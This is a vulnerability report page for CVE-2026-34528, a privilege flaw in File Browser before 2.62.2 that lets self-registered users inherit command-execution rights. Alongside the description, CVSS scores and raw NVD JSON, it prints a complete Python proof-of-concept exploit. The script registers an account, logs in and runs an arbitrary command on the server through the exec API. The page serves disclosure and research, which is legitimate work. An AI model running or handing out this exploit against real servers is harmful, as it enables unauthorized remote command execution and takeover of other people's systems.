Security Vulnerability Report
CVE-2026-34528 CVSS 8.1 HIGH

CVE-2026-34528

Published: 2026-04-01 21:17:01
Last Modified: 2026-04-06 20:41:20

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser < 2.62.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# Target configuration
target_host = "http://localhost:8080"
signup_url = f"{target_host}/api/public/signup"
login_url = f"{target_host}/api/login"
exec_url = f"{target_host}/api/resources/exec"

# Attacker credentials
username = "attacker"
password = "secure_password_123"

# Step 1: Register a new user
# The vulnerability triggers here: the new user inherits 'Execute' permission
signup_payload = {
    "username": username,
    "password": password,
}
try:
    response = requests.post(signup_url, json=signup_payload)
    if response.status_code == 200:
        print("[+] User registered successfully.")
    else:
        print("[-] Registration failed.")
        sys.exit()
except Exception as e:
    print(f"[-] Error during registration: {e}")
    sys.exit()

# Step 2: Login to get authentication token
login_payload = {
    "username": username,
    "password": password,
}
try:
    response = requests.post(login_url, json=login_payload)
    if response.status_code == 200:
        token = response.json().get("data")
        print(f"[+] Logged in. Token: {token}")
    else:
        print("[-] Login failed.")
        sys.exit()
except Exception as e:
    print(f"[-] Error during login: {e}")
    sys.exit()

# Step 3: Execute arbitrary command
# Using the inherited permission to run commands (e.g., 'id' or 'whoami')
headers = {
    "X-Auth": token,
    "Content-Type": "application/json",
}

# Command to execute (must be in the allowed commands list or via shell bypass if configured)
command_payload = {
    "command": "whoami",
    "async": False,
}
try:
    response = requests.post(exec_url, json=command_payload, headers=headers)
    if response.status_code == 200:
        print("[+] Command executed successfully.")
        print("[+] Output:", response.text)
    else:
        print(f"[-] Command execution failed. Status: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] Error during command execution: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34528", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:17:00.660", "lastModified": "2026-04-06T20:41:19.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], 
"configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.62.2", "matchCriteriaId": "A22210FE-83DA-49B9-A015-543942FE731F"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-x8jc-jvqm-pm3f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-x8jc-jvqm-pm3f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}